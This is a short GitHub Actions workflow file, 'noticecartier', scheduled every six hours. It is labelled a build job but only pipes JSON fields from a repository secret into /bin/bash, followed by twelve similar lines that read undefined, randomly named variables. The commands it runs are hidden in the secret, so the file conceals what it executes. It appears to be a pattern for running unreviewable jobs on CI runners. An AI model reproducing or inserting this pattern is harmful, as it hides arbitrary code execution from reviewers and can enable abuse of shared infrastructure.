name: noticecartier

on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: noticecartier
        env:
          vvvxr27626: ${{ secrets.vvvxr27626 }}
        run: |
          echo $vvvxr27626 | jq -r .vnhcr62 | /bin/bash
          echo $qpamf3 | jq -r .rur2 | /bin/bash
          echo $xfngu44536 | jq -r .xqyl6387 | /bin/bash
          echo $wtkq4 | jq -r .j6000 | /bin/bash
          echo $aop93650 | jq -r .zycbz7184 | /bin/bash
          echo $lb83 | jq -r .b45 | /bin/bash
          echo $dsw668 | jq -r .b30 | /bin/bash
          echo $xzhy521 | jq -r .n751 | /bin/bash
          echo $rir2 | jq -r .so89126 | /bin/bash
          echo $hjb055 | jq -r .c463 | /bin/bash
          echo $ugw806 | jq -r .ryvi51 | /bin/bash
          echo $ncvz79210 | jq -r .ogwd39998 | /bin/bash
          echo $lb54 | jq -r .h999 | /bin/bash

